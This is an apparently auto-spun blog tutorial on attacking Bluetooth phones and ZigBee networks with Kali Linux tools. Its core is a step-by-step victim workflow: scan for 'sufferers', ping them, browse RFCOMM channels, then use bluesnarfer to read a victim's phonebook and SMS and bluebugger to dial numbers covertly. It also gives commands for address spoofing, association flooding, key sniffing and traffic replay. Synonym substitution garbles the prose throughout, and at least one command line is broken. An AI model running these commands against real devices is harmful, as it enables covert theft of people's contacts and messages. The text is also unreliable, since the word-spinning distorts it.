Best Tools To mod Bluetooth and Any Wireless Connection in Kali Linux

How To mod Smartphone Bluetooth by the use of kali Linux

Checklist Of gear to mod bluetooth:


Blooover is acting the Bluebug assault. Whilst you intend to put in the applying, you will have to be the use of a cellphone that has the Java Bluetooth API carried out.


  • Studying phonebooks
  • Writing phonebook entries
  • Studying/deciphering SMS saved at the software
  • Environment name ahead
  • Starting up cellphone name


Bluelog is a Linux Bluetooth scanner with not obligatory daemon mode and internet front-end, designed for website online surveys and site visitors tracking. It’s meant to be run for lengthy sessions of time in a static location to resolve what number of discoverable Bluetooth instruments there are within the space.

Use the beneath command to look the close by bluetooth software main points in log document named btdevices.log

bluelog -i hci0 -o /root/Desktop/btdevices.log –v

This command supply Additional info together with knowledge of producer, broadcast names and software elegance.

bluelog -i hci0 -mnc -o /root/Desktop/btdevices2.log –v

BlueMaho:Bluetooth Hacker App

BlueMaho is GUI-shell (interface) for suite of gear for trying out safety of bluetooth instruments. It’s freeware, opensource, written on python, makes use of wxPyhon. It may be used for trying out BT-devices for recognized vulnerabilities and main factor to do – trying out to search out unknown vulns. Additionally it could shape great statistics.

BlueMaho, an built-in Bluetooth scanning/hacking software. Right here we can merely use it for scanning. You’ll be able to get started BlueMaho’s sublime GUI by means of typing:

Whilst you do, it opens a GUI. Right here, I’ve clicked at the “get SDP data” and hit the play button to the left. BlueMaho starts scanning for discoverable instruments, and prefer the opposite gear, it reveals two Bluetooth instruments.

Within the backside window, BlueMaho shows extra data from the scanned instruments. I’ve copied that data and positioned it right into a textual content document to make it more uncomplicated so that you can learn.

Word that it shows the title of the primary software after which describes the software kind as “Audio/Video, Headset profile.” Then determine 2d software and we’re informed its software kind is “Telephone, Sensible cellphone.”

Now, that we understand how to collect knowledge at the Bluetooth instruments in our vary,


BlueRanger is a straightforward Bash script which makes use of Hyperlink High quality to find Bluetooth software radios. It sends l2cap (Bluetooth) pings to create a connection between Bluetooth interfaces, since maximum instruments permit pings with none authentication or authorization. The upper the hyperlink high quality, the nearer the software (in idea).

Use a Bluetooth Magnificence 1 adapter for lengthy vary location detection. Transfer to a Magnificence 3 adapter for extra actual quick vary finding. The recision and accuracy rely at the construct high quality of the Bluetooth adapter, interference, and reaction from the far off software. Fluctuations might happen even if neither software is in movement.

Use the Bluetooth interface (hci1) to scan for the desired far off deal with (20:C9:D0:43:4B:D8):

[email protected]:~# hci1 20:C9:D0:43:4B:D8Bluesnarfer

Bluesnarfer downloads the phone-book of any cellular software at risk of Bluesnarfing. If an cell phone is prone, it’s imaginable to connect with the telephone with out alerting the landlord, and acquire get right of entry to to limited parts of the saved information

Scan the far off software deal with (-b 20:C9:D0:43:4B:D8) and get the software data (-i):

[email protected]:~# bluesnarfer -b 20:C9:D0:43:4B:D8 -i

mod Cell Bluetooth The usage of Bluesnarfer

Take a look at The Configuration

hciconfig hci0

Scan for sufferers

hcitool scan hci0

Ping the vitcim software to look if software is conscious

l2ping < Victim MAC Addr>

Browse the sufferer for rfcomm channels to connect with

sdptool browse –tree –l2cap < mac addr >

Then you’ll use bluesnarfer as an example to learn the sufferers phonebook, dial a bunch or learn Sms or different issues

Bluesnarfer -r 1-100 -C 7 -b < mac addr >

To peer to be had opions to do 

bluebugger -h

Dial quantity

bluebugger -m < victim name > -c 7 -a < mac addr > Dial < number >

Btscanner :mod Bluetooth In Kali Linux

Btscanner software can seize knowledge from a Bluetooth software with out pairing. You’ll be able to obtain Btscanner the use of this Hyperlink ^( The setup could be very small is measurement (best 1.05 MB) and simple to put in. Btscanner seek instruments and display them at the display and if you wish to see extra data simply hit input and it’s going to display instruments mac deal with.

1 Get started your bluetooth with that command

Syntax:-service bluetooth get started

2 Now open the btscanner with this command 

Syntax:- btscanner

Now you might be right here

3 Now see the directions which can be given beneath in my case press i . and your scan is began

4.Now you in finding the bluetooth software listing

5.Now choose with the arrow keys and press input and get complete data concerning the bluetooth.


RedFang is a small proof-of-concept software to search out non discoverable Bluetooth instruments. That is executed by means of brute forcing the remaining six (6) bytes of the Bluetooth deal with of the software and doing a read_remote_name().

Scan the given vary (-r 00803789EE76-00803789EEff) and uncover Bluetooth instruments (-s):

[email protected]:~# fang -r 00803789EE76-00803789EEff -s


Spooftooph is designed to automate spoofing or cloning Bluetooth software knowledge. Spooftooph is designed to automate spoofing or cloning Bluetooth software Title, Magnificence, and Cope with. Cloning this data successfully permits Bluetooth software to cover in simple website online. Bluetooth scanning tool will best listing one of the instruments if greater than one software in vary stocks the similar software knowledge when the instruments are in Discoverable Mode (particularly the similar Cope with).

Neatly in most cases maximum people by no means intend to audit the Bluetooth stack in any group. However this software might be fascinating to make use of in an atmosphere the place Bluetooth instruments were paired with essential hardware.

Use the Bluetooth interface (-i hci1) to spoof itself because the given deal with (-a 00803789EE76):

[email protected]:~# spooftooph -i hci1 -a 00803789EE76

Different Wi-fi Equipment


Transmit a flood of affiliate requests to a goal community.

zbassocflood [-pcDis] [-i devnumstring] [-p PAN ID] [-c channel] [-s per-packet delay/float] 

zbassocflood -p 0xBAAD -c 11 -s 0.1


Decode plaintext key ZigBee supply from a seize document. Will procedure libpcap or Daintree SNA seize recordsdata.

zbdsniff: Decode plaintext key ZigBee supply from a seize document. Will procedure libpcap or Daintree SNA seize recordsdata

zbdsniff [capturefiles …]


A tcpdump-like software for ZigBee/IEEE 802.15.4 networks

zbdump – a tcpdump-like software for ZigBee/IEEE 802.15.4 networks Appropriate with Wireshark 1.1.2 and later

zbdump [-fiwDch] [-f channel] [-w pcapfile] [-W daintreefile] [-i devnumstring]


zbfind supplies a GTK-based GUI to the person which shows the result of a zbstumbler-like capability. zbfind sends beacon requests because it cycles thru channels and listens for a reaction, including the reaction to a desk in addition to exhibiting sign power on a gauge widget.


Seek a binary document to spot the encryption key for a given SNA or libpcap IEEE 802.15.4 encrypted packet

zbgoodfind – seek a binary document to spot the encryption key for a given SNA or libpcap IEEE 802.15.4 encrypted packet:

zbgoodfind [-frRFd] [-f binary file] [-r pcapfile] [-R daintreefile] [-F Don’t skip 2-byte FCS at end of each frame] [-d genenerate binary file (test mode)]


Replay ZigBee/802.15.4 community site visitors from libpcap or Daintree recordsdata

zbreplay: replay ZigBee/802.15.4 community site visitors from libpcap or Daintree recordsdata:

zbreplay [-rRfiDch] [-f channel] [-r pcapfile] [-R daintreefile] [-i devnumstring] [-s delay/float] [-c countpackets]


Transmit beacon request frames to the published deal with whilst channel hopping to spot ZC/ZR instruments.